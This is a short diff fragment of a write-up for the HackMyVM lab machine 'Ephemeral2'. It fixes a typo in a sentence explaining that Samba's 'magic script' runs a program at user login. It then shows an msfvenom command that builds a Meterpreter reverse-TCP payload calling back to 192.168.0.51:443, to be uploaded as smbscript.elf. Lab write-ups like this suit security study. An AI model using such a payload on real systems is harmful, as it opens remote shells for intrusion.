garffff-bot/garffff-bot.github.io/content/Hackmyvm/Medium/Ephemeral2.md

 ![[Pasted image 20240811200236.png]]

-So basically, when a user logs in, the or program that the `magic script` points to gets executed.
+So basically, when a user logs in, the script or program that the `magic script` points to gets executed.
 I will create a meterpreter payload using msfvenom, save it as `smbscript.elf` and upload it:

 ```bash
 garffff@garffff:~/hackmyvm/ephemeral2$ sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=443 -f elf > smbscript.elf